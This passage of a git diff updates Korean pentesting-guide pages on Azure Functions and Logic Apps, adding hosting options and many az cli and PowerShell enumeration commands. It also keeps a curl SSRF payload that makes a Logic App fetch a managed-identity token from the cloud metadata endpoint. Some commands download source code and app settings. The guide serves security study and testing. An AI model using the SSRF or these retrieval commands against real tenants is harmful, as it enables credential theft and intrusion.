์žˆ์Šต๋‹ˆ๋‹ค: @@ -86,8 +86,8 @@ HTTP ํŠธ๋ฆฌ๊ฑฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•จ์ˆ˜ ๋‚ด์—์„œ ์—”๋“œํฌ์ธํŠธ๋ฅผ ์ƒ์„ฑํ•  ๋•Œ - **Function Keys:** ํ•จ์ˆ˜ ํ‚ค๋Š” ๊ธฐ๋ณธ ๋˜๋Š” ์‚ฌ์šฉ์ž ์ •์˜์ผ ์ˆ˜ ์žˆ์œผ๋ฉฐ, Function App ๋‚ด์˜ **ํŠน์ • ํ•จ์ˆ˜ ์—”๋“œํฌ์ธํŠธ**์—๋งŒ ์ ‘๊ทผ์„ ํ—ˆ์šฉํ•˜๋„๋ก ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. - **Host Keys:** ํ˜ธ์ŠคํŠธ ํ‚ค๋Š” ๊ธฐ๋ณธ ๋˜๋Š” ์‚ฌ์šฉ์ž ์ •์˜์ผ ์ˆ˜ ์žˆ์œผ๋ฉฐ, FUNCTION ์ ‘๊ทผ ์ˆ˜์ค€์œผ๋กœ Function App ๋‚ด์˜ **๋ชจ๋“  ํ•จ์ˆ˜ ์—”๋“œํฌ์ธํŠธ**์— ์ ‘๊ทผ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. -- **Master Key:** ๋งˆ์Šคํ„ฐ ํ‚ค(`_master`)๋Š” ๋ชจ๋“  ํ•จ์ˆ˜ ์—”๋“œํฌ์ธํŠธ์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ํฌํ•จํ•˜์—ฌ **์Šน๊ฒฉ๋œ ๊ถŒํ•œ**์„ ์ œ๊ณตํ•˜๋Š” ๊ด€๋ฆฌ ํ‚ค์ž…๋‹ˆ๋‹ค. ์ด **ํ‚ค๋Š” ์ทจ์†Œํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.** -- **System Keys:** ์‹œ์Šคํ…œ ํ‚ค๋Š” **ํŠน์ • ํ™•์žฅ์— ์˜ํ•ด ๊ด€๋ฆฌ**๋˜๋ฉฐ, ๋‚ด๋ถ€ ๊ตฌ์„ฑ ์š”์†Œ์—์„œ ์‚ฌ์šฉํ•˜๋Š” ์›นํ›… ์—”๋“œํฌ์ธํŠธ์— ์ ‘๊ทผํ•˜๋Š” ๋ฐ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, ์ด๋ฒคํŠธ ๊ทธ๋ฆฌ๋“œ ํŠธ๋ฆฌ๊ฑฐ ๋ฐ ๋‚ด๊ตฌ์„ฑ ํ•จ์ˆ˜๋Š” ์‹œ์Šคํ…œ ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•ด๋‹น API์™€ ์•ˆ์ „ํ•˜๊ฒŒ ์ƒํ˜ธ์ž‘์šฉํ•ฉ๋‹ˆ๋‹ค. +- **Master Key:** ๋งˆ์Šคํ„ฐ ํ‚ค(`_master`)๋Š” ๋ชจ๋“  ํ•จ์ˆ˜ ์—”๋“œํฌ์ธํŠธ์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ํฌํ•จํ•˜์—ฌ ๊ถŒํ•œ์ด ์ƒ์Šน๋œ ๊ด€๋ฆฌ ํ‚ค๋กœ, ์ด **ํ‚ค๋Š” ์ทจ์†Œํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.** +- **System Keys:** ์‹œ์Šคํ…œ ํ‚ค๋Š” **ํŠน์ • ํ™•์žฅ์— ์˜ํ•ด ๊ด€๋ฆฌ**๋˜๋ฉฐ, ๋‚ด๋ถ€ ๊ตฌ์„ฑ ์š”์†Œ์—์„œ ์‚ฌ์šฉํ•˜๋Š” ์›นํ›… ์—”๋“œํฌ์ธํŠธ์— ์ ‘๊ทผํ•˜๋Š” ๋ฐ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, Event Grid ํŠธ๋ฆฌ๊ฑฐ ๋ฐ Durable Functions๋Š” ์‹œ์Šคํ…œ ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•ด๋‹น API์™€ ์•ˆ์ „ํ•˜๊ฒŒ ์ƒํ˜ธ์ž‘์šฉํ•ฉ๋‹ˆ๋‹ค. > [!TIP] > ํ‚ค๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•จ์ˆ˜ API ์—”๋“œํฌ์ธํŠธ์— ์ ‘๊ทผํ•˜๋Š” ์˜ˆ: @@ -96,7 +96,7 @@ HTTP ํŠธ๋ฆฌ๊ฑฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•จ์ˆ˜ ๋‚ด์—์„œ ์—”๋“œํฌ์ธํŠธ๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ### ๊ธฐ๋ณธ ์ธ์ฆ -App Services์™€ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ Functions๋Š” **SCM** ๋ฐ **FTP**์— ์—ฐ๊ฒฐํ•˜์—ฌ ์ฝ”๋“œ๋ฅผ ๋ฐฐํฌํ•˜๊ธฐ ์œ„ํ•ด Azure์—์„œ ์ œ๊ณตํ•˜๋Š” **์‚ฌ์šฉ์ž ์ด๋ฆ„๊ณผ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ํฌํ•จ๋œ URL**์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ธฐ๋ณธ ์ธ์ฆ์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. ์ด์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€: +App Services์™€ ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ, Functions๋Š” **SCM** ๋ฐ **FTP**์— ์—ฐ๊ฒฐํ•˜์—ฌ ์ฝ”๋“œ๋ฅผ ๋ฐฐํฌํ•˜๊ธฐ ์œ„ํ•ด Azure์—์„œ ์ œ๊ณตํ•˜๋Š” **์‚ฌ์šฉ์ž ์ด๋ฆ„๊ณผ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ํฌํ•จ๋œ URL**์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ธฐ๋ณธ ์ธ์ฆ์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. ์ด์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€: {{#ref}} az-app-services.md @@ -104,7 +104,7 @@ az-app-services.md ### Github ๊ธฐ๋ฐ˜ ๋ฐฐํฌ -ํ•จ์ˆ˜๊ฐ€ Github ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ƒ์„ฑ๋  ๋•Œ Azure ์›น ์ฝ˜์†”์€ **ํŠน์ • ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ž๋™์œผ๋กœ Github ์›Œํฌํ”Œ๋กœ๋ฅผ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜์—ฌ ์ด ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๊ฐ€ ์—…๋ฐ์ดํŠธ๋  ๋•Œ๋งˆ๋‹ค ํ•จ์ˆ˜์˜ ์ฝ”๋“œ๊ฐ€ ์—…๋ฐ์ดํŠธ๋ฉ๋‹ˆ๋‹ค. ์‹ค์ œ๋กœ ํŒŒ์ด์ฌ ํ•จ์ˆ˜์— ๋Œ€ํ•œ Github Action yaml์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: +ํ•จ์ˆ˜๊ฐ€ Github ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ƒ์„ฑ๋  ๋•Œ Azure ์›น ์ฝ˜์†”์€ **ํŠน์ • ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ž๋™์œผ๋กœ Github Workflow๋ฅผ ์ƒ์„ฑ**ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋ฉฐ, ์ด ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๊ฐ€ ์—…๋ฐ์ดํŠธ๋  ๋•Œ๋งˆ๋‹ค ํ•จ์ˆ˜์˜ ์ฝ”๋“œ๊ฐ€ ์—…๋ฐ์ดํŠธ๋ฉ๋‹ˆ๋‹ค. ์‹ค์ œ๋กœ ํŒŒ์ด์ฌ ํ•จ์ˆ˜์— ๋Œ€ํ•œ Github Action yaml์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:
@@ -192,18 +192,22 @@ package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }} ```
-๋˜ํ•œ, **Managed Identity**๊ฐ€ ์ƒ์„ฑ๋˜์–ด ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์˜ Github Action์ด ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Azure์— ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” **Managed Identity**์— ๋Œ€ํ•ด ์—ฐํ•ฉ ์ž๊ฒฉ ์ฆ๋ช…์„ ์ƒ์„ฑํ•˜์—ฌ **Issuer** `https://token.actions.githubusercontent.com`์™€ **Subject Identifier** `repo:/:ref:refs/heads/`๋ฅผ ํ—ˆ์šฉํ•จ์œผ๋กœ์จ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค. +๋˜ํ•œ, **Managed Identity**๊ฐ€ ์ƒ์„ฑ๋˜์–ด ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์˜ Github Action์ด ์ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ Azure์— ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” **Managed Identity**์— ๋Œ€ํ•ด **Issuer** `https://token.actions.githubusercontent.com`์™€ **Subject Identifier** `repo:/:ref:refs/heads/`๋ฅผ ํ—ˆ์šฉํ•˜๋Š” Federated credential์„ ์ƒ์„ฑํ•จ์œผ๋กœ์จ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค. > [!CAUTION] -> ๋”ฐ๋ผ์„œ ํ•ด๋‹น ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋ฅผ ์†์ƒ์‹œํ‚ค๋Š” ์‚ฌ๋žŒ์€ ๊ธฐ๋Šฅ๊ณผ ์ด์— ์—ฐ๊ฒฐ๋œ Managed Identities๋ฅผ ์†์ƒ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +> ๋”ฐ๋ผ์„œ, ํ•ด๋‹น ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๋ฅผ ์†์ƒ์‹œํ‚ค๋Š” ์‚ฌ๋žŒ์€ ํ•จ์ˆ˜์™€ ๊ทธ์— ์—ฐ๊ฒฐ๋œ Managed Identities๋ฅผ ์†์ƒ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -### Container Based Deployments +### ์ปจํ…Œ์ด๋„ˆ ๊ธฐ๋ฐ˜ ๋ฐฐํฌ ๋ชจ๋“  ์š”๊ธˆ์ œ๊ฐ€ ์ปจํ…Œ์ด๋„ˆ ๋ฐฐํฌ๋ฅผ ํ—ˆ์šฉํ•˜๋Š” ๊ฒƒ์€ ์•„๋‹ˆ์ง€๋งŒ, ํ—ˆ์šฉํ•˜๋Š” ๊ฒฝ์šฐ ๊ตฌ์„ฑ์—๋Š” ์ปจํ…Œ์ด๋„ˆ์˜ URL์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. API์—์„œ **`linuxFxVersion`** ์„ค์ •์€ `DOCKER|mcr.microsoft.com/...`์™€ ๊ฐ™์€ ํ˜•ํƒœ๋ฅผ ๊ฐ€์งˆ ๊ฒƒ์ด๋ฉฐ, ์›น ์ฝ˜์†”์—์„œ๋Š” ๊ตฌ์„ฑ์— **image settings**๊ฐ€ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ, **์†Œ์Šค ์ฝ”๋“œ๋Š” ํ•จ์ˆ˜์™€ ๊ด€๋ จ๋œ ์Šคํ† ๋ฆฌ์ง€** ๊ณ„์ •์— ์ €์žฅ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ํ•„์š”ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. -## Enumeration +## ์—ด๊ฑฐ + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List all the functions az functionapp list @@ -249,6 +253,30 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func # Get source code az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.Functions + +# Lists all Function Apps in the current subscription or in a specific resource group. +Get-AzFunctionApp -ResourceGroupName + +# Displays the regions where Azure Function Apps are available for deployment. +Get-AzFunctionAppAvailableLocation + +# Retrieves details about Azure Function App plans in a subscription or resource group. +Get-AzFunctionAppPlan -ResourceGroupName -Name + +# Retrieves the app settings for a specific Azure Function App. +Get-AzFunctionAppSetting -Name -ResourceGroupName +``` +{% endcode %} +{% endtab %} +{% endtabs %} + ## ๊ถŒํ•œ ์ƒ์Šน {{#ref}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md index 5adcec3fe..8cb72d3a5 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md @@ -11,7 +11,7 @@ Logic Apps๋Š” **๊ด‘๋ฒ”์œ„ํ•œ ์‚ฌ์ „ ๊ตฌ์ถ•๋œ ์ปค๋„ฅํ„ฐ**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์›Œํฌ ### ์˜ˆ์‹œ - **๋ฐ์ดํ„ฐ ํŒŒ์ดํ”„๋ผ์ธ ์ž๋™ํ™”**: Logic Apps๋Š” Azure Data Factory์™€ ๊ฒฐํ•ฉํ•˜์—ฌ **๋ฐ์ดํ„ฐ ์ „์†ก ๋ฐ ๋ณ€ํ™˜ ํ”„๋กœ์„ธ์Šค**๋ฅผ ์ž๋™ํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” Azure SQL Database์™€ Azure Blob Storage์™€ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ๋ฐ์ดํ„ฐ ์ €์žฅ์†Œ ๊ฐ„์— ๋ฐ์ดํ„ฐ๋ฅผ ์ด๋™ํ•˜๊ณ  ๋ณ€ํ™˜ํ•˜๋Š” ํ™•์žฅ ๊ฐ€๋Šฅํ•˜๊ณ  ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ ํŒŒ์ดํ”„๋ผ์ธ์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์œ ์šฉํ•˜๋ฉฐ, ๋ถ„์„ ๋ฐ ๋น„์ฆˆ๋‹ˆ์Šค ์ธํ…”๋ฆฌ์ „์Šค ์ž‘์—…์— ๋„์›€์„ ์ค๋‹ˆ๋‹ค. -- **Azure Functions์™€ ํ†ตํ•ฉ**: Logic Apps๋Š” Azure Functions์™€ ํ•จ๊ป˜ ์ž‘๋™ํ•˜์—ฌ **ํ•„์š”์— ๋”ฐ๋ผ ํ™•์žฅ๋˜๋Š” ์ •๊ตํ•œ ์ด๋ฒคํŠธ ๊ธฐ๋ฐ˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๊ฐœ๋ฐœ**ํ•˜๊ณ  ๋‹ค๋ฅธ Azure ์„œ๋น„์Šค์™€ ์›ํ™œํ•˜๊ฒŒ ํ†ตํ•ฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์‚ฌ์šฉ ์‚ฌ๋ก€์˜ ์˜ˆ๋กœ๋Š” Logic App์„ ์‚ฌ์šฉํ•˜์—ฌ Azure Storage ๊ณ„์ •์˜ ๋ณ€๊ฒฝ๊ณผ ๊ฐ™์€ ํŠน์ • ์ด๋ฒคํŠธ์— ์‘๋‹ตํ•˜์—ฌ Azure Function์„ ํŠธ๋ฆฌ๊ฑฐํ•˜๋Š” ๊ฒƒ์ด ์žˆ์œผ๋ฉฐ, ์ด๋ฅผ ํ†ตํ•ด ๋™์  ๋ฐ์ดํ„ฐ ์ฒ˜๋ฆฌ๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. +- **Azure Functions์™€ ํ†ตํ•ฉ**: Logic Apps๋Š” Azure Functions์™€ ํ•จ๊ป˜ ์ž‘๋™ํ•˜์—ฌ **ํ•„์š”์— ๋”ฐ๋ผ ํ™•์žฅ๋˜๋Š” ์ •๊ตํ•œ ์ด๋ฒคํŠธ ๊ธฐ๋ฐ˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๊ฐœ๋ฐœ**ํ•˜๊ณ  ๋‹ค๋ฅธ Azure ์„œ๋น„์Šค์™€ ์›ํ™œํ•˜๊ฒŒ ํ†ตํ•ฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, Logic App์„ ์‚ฌ์šฉํ•˜์—ฌ Azure Storage ๊ณ„์ •์˜ ๋ณ€๊ฒฝ๊ณผ ๊ฐ™์€ ํŠน์ • ์ด๋ฒคํŠธ์— ์‘๋‹ตํ•˜์—ฌ Azure Function์„ ํŠธ๋ฆฌ๊ฑฐํ•˜๋Š” ์‚ฌ์šฉ ์‚ฌ๋ก€๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ๋™์  ๋ฐ์ดํ„ฐ ์ฒ˜๋ฆฌ๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ### LogicAPP ์‹œ๊ฐํ™” @@ -30,34 +30,260 @@ Logic Apps๋Š” **๊ด‘๋ฒ”์œ„ํ•œ ์‚ฌ์ „ ๊ตฌ์ถ•๋œ ์ปค๋„ฅํ„ฐ**๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์›Œํฌ # The URL belongs to a Logic App vulenrable to SSRF curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v ``` -### Enumeration +### ํ˜ธ์ŠคํŒ… ์˜ต์…˜ -{{#tabs }} -{{#tab name="az cli" }} +์—ฌ๋Ÿฌ ํ˜ธ์ŠคํŒ… ์˜ต์…˜์ด ์žˆ์Šต๋‹ˆ๋‹ค: + +* **์†Œ๋น„ํ˜•** +- **๋‹ค์ค‘ ํ…Œ๋„ŒํŠธ**: ๊ณต์œ  ์ปดํ“จํŒ… ๋ฆฌ์†Œ์Šค๋ฅผ ์ œ๊ณตํ•˜๋ฉฐ, ํผ๋ธ”๋ฆญ ํด๋ผ์šฐ๋“œ์—์„œ ์šด์˜๋˜๊ณ , ์ž‘์—…๋‹น ์š”๊ธˆ ๋ชจ๋ธ์„ ๋”ฐ๋ฆ…๋‹ˆ๋‹ค. ์ด๋Š” ๊ฒฝ๋Ÿ‰ ๋ฐ ๋น„์šฉ ํšจ์œจ์ ์ธ ์ž‘์—…์— ์ด์ƒ์ ์ž…๋‹ˆ๋‹ค. +* **ํ‘œ์ค€** +- **์›Œํฌํ”Œ๋กœ์šฐ ์„œ๋น„์Šค ๊ณ„ํš**: ๋„คํŠธ์›Œํ‚น์„ ์œ„ํ•œ VNET ํ†ตํ•ฉ์ด ์žˆ๋Š” ์ „์šฉ ์ปดํ“จํŒ… ๋ฆฌ์†Œ์Šค์™€ ์›Œํฌํ”Œ๋กœ์šฐ ์„œ๋น„์Šค ๊ณ„ํš ์ธ์Šคํ„ด์Šค๋‹น ์š”๊ธˆ์„ ๋ถ€๊ณผํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋” ๋งŽ์€ ์ œ์–ด๊ฐ€ ํ•„์š”ํ•œ ์š”๊ตฌ๊ฐ€ ๋งŽ์€ ์ž‘์—…์— ์ ํ•ฉํ•ฉ๋‹ˆ๋‹ค. +- **์•ฑ ์„œ๋น„์Šค ํ™˜๊ฒฝ V3**: ์™„์ „ํ•œ ๊ฒฉ๋ฆฌ ๋ฐ ํ™•์žฅ์„ฑ์„ ๊ฐ–์ถ˜ ์ „์šฉ ์ปดํ“จํŒ… ๋ฆฌ์†Œ์Šค์ž…๋‹ˆ๋‹ค. ๋˜ํ•œ ๋„คํŠธ์›Œํ‚น์„ ์œ„ํ•ด VNET๊ณผ ํ†ตํ•ฉ๋˜๋ฉฐ, ํ™˜๊ฒฝ ๋‚ด์˜ ์•ฑ ์„œ๋น„์Šค ์ธ์Šคํ„ด์Šค๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•œ ์š”๊ธˆ ๋ชจ๋ธ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋†’์€ ๊ฒฉ๋ฆฌ๊ฐ€ ํ•„์š”ํ•œ ๊ธฐ์—… ๊ทœ๋ชจ์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์— ์ด์ƒ์ ์ž…๋‹ˆ๋‹ค. +- **ํ•˜์ด๋ธŒ๋ฆฌ๋“œ**: ๋กœ์ปฌ ์ฒ˜๋ฆฌ ๋ฐ ๋‹ค์ค‘ ํด๋ผ์šฐ๋“œ ์ง€์›์„ ์œ„ํ•ด ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๊ณ ๊ฐ ๊ด€๋ฆฌํ˜• ์ปดํ“จํŒ… ๋ฆฌ์†Œ์Šค๋ฅผ ๋กœ์ปฌ ๋„คํŠธ์›Œํฌ ์•ก์„ธ์Šค์™€ ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, Kubernetes ์ด๋ฒคํŠธ ๊ธฐ๋ฐ˜ ์ž๋™ ํ™•์žฅ(KEDA)์„ ํ™œ์šฉํ•ฉ๋‹ˆ๋‹ค. + +### ์—ด๊ฑฐ + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List -az logic workflow list --resource-group --subscription --output table +az logic workflow list --resource-group # Get info -az logic workflow show --name --resource-group --subscription -# Get Logic App config -az logic workflow definition show --name --resource-group --subscription -# Get service ppal used -az logic workflow identity show --name --resource-group --subscription -``` -{{#endtab }} +az logic workflow show --name --resource-group -{{#tab name="Az PowerSHell" }} +# Get details of a specific Logic App workflow, including its connections and parameters +az rest \ +--method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&$expand=connections.json,parameters.json" \ +--headers "Content-Type=application/json" + +# Get details about triggers for a specific Logic App +az rest --method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01" + +# Get the callback URL for a specific trigger in a Logic App +az rest --method POST \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01" + +# Get the history of a specific trigger in a Logic App +az rest --method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01" + +# List all runs of a specific Logic App workflow +az rest \ +--method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \ +--headers "Content-Type=application/json" + +# Get all actions within a specific run of a Logic App workflow +az rest \ +--method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \ +--headers "Content-Type=application/json" + +# List all versions of a specific Logic App workflow +az rest \ +--method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \ +--headers "Content-Type=application/json" + +# Get details of a specific version of a Logic App workflow +az rest \ +--method GET \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \ +--headers "Content-Type=application/json" + +az rest \ +--method GET \ +--uri "https://examplelogicapp1994.scm.azurewebsites.net/api/functions/admin/download?includeCsproj=true&includeAppSettings=true" \ +--headers "Content-Type=application/json" + +# List all Logic Apps in the specified resource group +az logicapp list --resource-group + +# Show detailed information about a specific Logic App +az logicapp show --name --resource-group + +# List all application settings for a specific Logic App +az logicapp config appsettings list --name --resource-group +``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} ```bash +Get-Command -Module Az.LogicApp + # List Get-AzLogicApp -ResourceGroupName # Get info Get-AzLogicApp -ResourceGroupName -Name -# Get Logic App config -(Get-AzLogicApp -ResourceGroupName -Name ).Definition | ConvertTo-Json -# Get service ppal used -(Get-AzLogicApp -ResourceGroupName -Name ).Identity -``` -{{#endtab }} -{{#endtabs }} -{{#include ../../../banners/hacktricks-training.md}} +# Get details of a specific Logic App workflow run action +Get-AzLogicAppRunAction -ResourceGroupName "" -Name "" -RunName "" + +# Get the run history for a specific Logic App +Get-AzLogicAppRunHistory -ResourceGroupName "" -Name "" + +# Get details about triggers for a specific Logic App +Get-AzLogicAppTrigger -ResourceGroupName "" -Name "" + +# Get the callback URL for a specific trigger in a Logic App +Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "" -LName "" -TriggerName "" + +# Get the history of a specific trigger in a Logic App +Get-AzLogicAppTriggerHistory -ResourceGroupName "" -Name "" -TriggerName "" + +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + + +### ํ†ตํ•ฉ ๊ณ„์ • +**ํ†ตํ•ฉ ๊ณ„์ •**์€ Azure Logic Apps์˜ ๊ธฐ๋Šฅ์ž…๋‹ˆ๋‹ค. ํ†ตํ•ฉ ๊ณ„์ •์€ EDI, AS2 ๋ฐ XML ์Šคํ‚ค๋งˆ ๊ด€๋ฆฌ์™€ ๊ฐ™์€ ๊ณ ๊ธ‰ B2B ๊ธฐ๋Šฅ์„ ํ™œ์„ฑํ™”ํ•˜์—ฌ ๊ธฐ์—… ์ˆ˜์ค€์˜ ํ†ตํ•ฉ์„ ์šฉ์ดํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ํ†ตํ•ฉ ๊ณ„์ •์€ Logic Apps์— ์‚ฌ์šฉ๋˜๋Š” ๋‹ค์Œ ์•„ํ‹ฐํŒฉํŠธ๋ฅผ ์ €์žฅํ•˜๋Š” Azure์˜ ์ปจํ…Œ์ด๋„ˆ์ž…๋‹ˆ๋‹ค: + +* ์Šคํ‚ค๋งˆ: ํ†ตํ•ฉ ๊ณ„์ •์—์„œ ๋ฉ”์‹œ์ง€๋ฅผ ๊ฒ€์ฆํ•˜๊ณ  ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•œ XML ์Šคํ‚ค๋งˆ๋ฅผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. +* ๋งต: ํ†ตํ•ฉ ์›Œํฌํ”Œ๋กœ ๋‚ด์—์„œ ๋ฐ์ดํ„ฐ ํ˜•์‹์„ ๋ณ€ํ™˜ํ•˜๊ธฐ ์œ„ํ•ด XSLT ๊ธฐ๋ฐ˜ ๋ณ€ํ™˜์„ ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค. +* ์–ด์…ˆ๋ธ”๋ฆฌ: ๋…ผ๋ฆฌ ๋ฐ ๋ฐ์ดํ„ฐ ์ฒ˜๋ฆฌ๋ฅผ ๊ฐ„์†Œํ™”ํ•˜๊ธฐ ์œ„ํ•ด ํ†ตํ•ฉ ๊ณ„์ • ์–ด์…ˆ๋ธ”๋ฆฌ๋ฅผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. +* ์ธ์ฆ์„œ: ๋ฉ”์‹œ์ง€๋ฅผ ์•”ํ˜ธํ™”ํ•˜๊ณ  ์„œ๋ช…ํ•˜๊ธฐ ์œ„ํ•œ ์ธ์ฆ์„œ๋ฅผ ์ฒ˜๋ฆฌํ•˜์—ฌ ์•ˆ์ „ํ•œ ํ†ต์‹ ์„ ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. +* ํŒŒํŠธ๋„ˆ: B2B ๊ฑฐ๋ž˜๋ฅผ ์œ„ํ•œ ๊ฑฐ๋ž˜ 